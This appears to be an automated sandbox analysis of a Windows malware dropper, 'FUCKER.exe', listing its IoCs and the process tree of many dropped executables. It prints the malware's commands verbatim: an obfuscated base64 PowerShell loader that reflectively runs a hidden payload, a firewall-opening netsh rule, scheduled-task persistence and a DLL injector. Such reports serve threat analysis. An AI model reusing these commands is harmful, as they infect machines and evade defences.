db2cd621b60097d592d699da5fd26d8ee9cbc25460c90bfe3a990518cd903eacaec9a927abad50c98096dee6d7e7135fcebf54405ce43a7d55fb83ea135b34a0d283b631c8455a06a044b4de5da698f8c52882aece8bc4b1e7368deb1bc54945f35541d8056cc6fb74e201a24925cdf994ebd952d24832cf6999309996d86fe184475d74958787715c2e2d8c69e622395445acb1ed26f5c475fd9a11a6742ce6f65e8df33ba049be35e576fdb0a0d momsstiflersdgjboigfnbio.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4664 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4972 powershell.exe 4972 powershell.exe 4972 powershell.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 404 u1w0.0.exe 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 5124 momsstiflersdgjboigfnbio.exe 5124 momsstiflersdgjboigfnbio.exe 5124 momsstiflersdgjboigfnbio.exe 6132 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 5448 vmtoolsd.exe 404 u1w0.0.exe 404 u1w0.0.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 3864 cmd.exe 3864 cmd.exe 3864 cmd.exe 3864 cmd.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 5224 flt_shovemydiscoupyourarse.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5448 vmtoolsd.exe 3864 cmd.exe 3864 cmd.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 1188 96513172.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 3028 FUCKER.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 1104 s1.exe Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 6076 SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe Token: 33 6108 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 6108 AUDIODG.EXE Token: SeDebugPrivilege 5260 MSBuild.exe Token: SeDebugPrivilege 2400 bin.exe Token: SeDebugPrivilege 464 Dolzkqnsbh.exe Token: SeDebugPrivilege 5612 asyns.exe Token: SeDebugPrivilege 4336 powershell.exe Token: SeDebugPrivilege 2060 tasklist.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
pid Process 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 4632 cp.exe -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe 3124 u1w0.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3028 wrote to memory of 1684 3028 FUCKER.exe 94 PID 3028 wrote to memory of 1684 3028 FUCKER.exe 94 PID 3028 wrote to memory of 1684 3028 FUCKER.exe 94 PID 3028 wrote to memory of 4632 3028 FUCKER.exe 97 PID 3028 wrote to memory of 4632 3028 FUCKER.exe 97 PID 3028 wrote to memory of 4632 3028 FUCKER.exe 97 PID 3028 wrote to memory of 3444 3028 FUCKER.exe 99 PID 3028 wrote to memory of 3444 3028 FUCKER.exe 99 PID 3028 wrote to memory of 3444 3028 FUCKER.exe 99 PID 1684 wrote to memory of 928 1684 bd2.exe 102 PID 1684 wrote to memory of 928 1684 bd2.exe 102 PID 1684 wrote to memory of 928 1684 bd2.exe 102 PID 3028 wrote to memory of 1104 3028 FUCKER.exe 103 PID 3028 wrote to memory of 1104 3028 FUCKER.exe 103 PID 3028 wrote to memory of 1104 3028 FUCKER.exe 103 PID 3028 wrote to memory of 3844 3028 FUCKER.exe 106 PID 3028 wrote to memory of 3844 3028 FUCKER.exe 106 PID 3028 wrote to memory of 3844 3028 FUCKER.exe 106 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3444 wrote to memory of 3068 3444 lumma2.exe 107 PID 3028 wrote to memory of 2448 3028 FUCKER.exe 108 PID 3028 wrote to memory of 2448 3028 FUCKER.exe 108 PID 3028 wrote to memory of 2448 3028 FUCKER.exe 108 PID 928 wrote to memory of 1096 928 wscript.exe 109 PID 928 wrote to memory of 1096 928 wscript.exe 109 PID 928 wrote to memory of 1096 928 wscript.exe 109 PID 1096 wrote to memory of 4972 1096 cmd.exe 111 PID 1096 wrote to memory of 4972 1096 cmd.exe 111 PID 1096 wrote to memory of 4972 1096 cmd.exe 111 PID 2448 wrote to memory of 404 2448 ISetup3.exe 113 PID 2448 wrote to memory of 404 2448 ISetup3.exe 113 PID 2448 wrote to memory of 404 2448 ISetup3.exe 113 PID 2448 wrote to memory of 3124 2448 ISetup3.exe 161 PID 2448 wrote to memory of 3124 2448 ISetup3.exe 161 PID 2448 wrote to memory of 3124 2448 ISetup3.exe 161 PID 3844 wrote to memory of 1188 3844 twztl.exe 121 PID 3844 wrote to memory of 1188 3844 twztl.exe 121 PID 3844 wrote to memory of 1188 3844 twztl.exe 121 PID 1096 wrote to memory of 3008 1096 cmd.exe 126 PID 1096 wrote to memory of 3008 1096 cmd.exe 126 PID 1096 wrote to memory of 3008 1096 cmd.exe 126 PID 3028 wrote to memory of 5124 3028 FUCKER.exe 127 PID 3028 wrote to memory of 5124 3028 FUCKER.exe 127 PID 3844 wrote to memory of 5480 3844 twztl.exe 128 PID 3844 wrote to memory of 5480 3844 twztl.exe 128 PID 3844 wrote to memory of 5480 3844 twztl.exe 128 PID 1188 wrote to memory of 5892 1188 96513172.exe 130 PID 1188 wrote to memory of 5892 1188 96513172.exe 130 PID 1188 wrote to memory of 5892 1188 96513172.exe 130 PID 3124 wrote to memory of 6076 3124 u1w0.1.exe 131 PID 3124 wrote to memory of 6076 3124 u1w0.1.exe 131 PID 5124 wrote to memory of 6132 5124 momsstiflersdgjboigfnbio.exe 132 PID 5124 wrote to memory of 6132 5124 momsstiflersdgjboigfnbio.exe 132 PID 5124 wrote to memory of 6132 5124 momsstiflersdgjboigfnbio.exe 132 PID 6132 wrote to memory of 5448 6132 vmtoolsd.exe 133 PID 6132 wrote to memory of 5448 6132 vmtoolsd.exe 133 PID 6132 wrote to memory of 5448 6132 vmtoolsd.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"C:\Users\Admin\AppData\Local\Temp\Files\bd2.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4972
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:5836
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:4068
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:5032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 16727⤵
- Program crash
PID:5436
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
PID:4632
-
-
C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe"C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3444 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3068
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s1.exe"C:\Users\Admin\AppData\Local\Temp\Files\s1.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Users\Admin\AppData\Local\Temp\96513172.exeC:\Users\Admin\AppData\Local\Temp\96513172.exe3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: SetClipboardViewer
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\3276515002.exeC:\Users\Admin\AppData\Local\Temp\3276515002.exe4⤵
- Executes dropped EXE
PID:5892
-
-
C:\Users\Admin\AppData\Local\Temp\248483651.exeC:\Users\Admin\AppData\Local\Temp\248483651.exe4⤵
- Executes dropped EXE
PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\192706194.exeC:\Users\Admin\AppData\Local\Temp\192706194.exe4⤵
- Executes dropped EXE
PID:3124
-
-
C:\Users\Admin\AppData\Local\Temp\2837029563.exeC:\Users\Admin\AppData\Local\Temp\2837029563.exe4⤵
- Executes dropped EXE
PID:4736
-
-
-
C:\Users\Admin\AppData\Local\Temp\3006430217.exeC:\Users\Admin\AppData\Local\Temp\3006430217.exe3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\2595526574.exeC:\Users\Admin\AppData\Local\Temp\2595526574.exe3⤵
- Executes dropped EXE
PID:5756
-
-
C:\Users\Admin\AppData\Local\Temp\2476721870.exeC:\Users\Admin\AppData\Local\Temp\2476721870.exe3⤵
- Executes dropped EXE
PID:5292 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c shutdown /r4⤵PID:396
-
C:\Windows\SysWOW64\shutdown.exeshutdown /r5⤵PID:3296
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ISetup3.exe"C:\Users\Admin\AppData\Local\Temp\Files\ISetup3.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe"C:\Users\Admin\AppData\Local\Temp\u1w0.0.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:404 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"4⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1392 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JJDHIDBFBF.exe6⤵PID:6140
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30007⤵
- Runs ping.exe
PID:4664
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 25804⤵
- Program crash
PID:5144
-
-
-
C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe"C:\Users\Admin\AppData\Local\Temp\u1w0.1.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD14⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6076
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 11883⤵
- Program crash
PID:2420
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe"C:\Users\Admin\AppData\Local\Temp\Files\momsstiflersdgjboigfnbio.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5124 -
C:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exeC:\Users\Admin\AppData\Local\Temp\eoq_cli_dbg\vmtoolsd.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6132 -
C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"C:\Users\Admin\AppData\Roaming\eoq_cli_dbg\vmtoolsd.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5448 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3864 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5260
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"2⤵
- Executes dropped EXE
PID:3956 -
C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"C:\Users\Admin\AppData\Local\Temp\Files\PresentationFontCache.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4268
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted_15a94542.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted_15a94542.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6104 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5252
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:2608
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"C:\Users\Admin\AppData\Local\Temp\Files\flt_shovemydiscoupyourarse.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:5224
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test2.exe"C:\Users\Admin\AppData\Local\Temp\Files\test2.exe"2⤵
- Executes dropped EXE
PID:5156
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe"C:\Users\Admin\AppData\Local\Temp\Files\jokerpos.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5388 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3476
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\2.3.1.1.exe"2⤵
- Executes dropped EXE
PID:5488
-
-
C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe"C:\Users\Admin\AppData\Local\Temp\Files\asyns.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5612
-
-
C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"C:\Users\Admin\AppData\Local\Temp\Files\bin.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Dolzkqnsbh.exe"C:\Users\Admin\AppData\Local\Temp\Files\Dolzkqnsbh.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:464
-
-
C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"2⤵
- Executes dropped EXE
PID:5092 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\Files\d21cbe21e38b385a41a68c5e6dd32f4c.exe"3⤵PID:5744
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:3688
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵PID:852
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
PID:5456
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:2956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:1748
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵PID:5500
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:788
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
PID:1892
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵PID:5784
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:4660
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:1968
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵PID:448
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"2⤵
- Executes dropped EXE
PID:6092 -
C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"C:\Users\Admin\AppData\Local\Temp\Files\Creal.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"4⤵PID:1112
-
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe"C:\Users\Admin\AppData\Local\Temp\Files\fullwork.exe"2⤵PID:2128
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4796
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"C:\Users\Admin\AppData\Local\Temp\Files\crypted_69a30000.exe"2⤵PID:5508
-
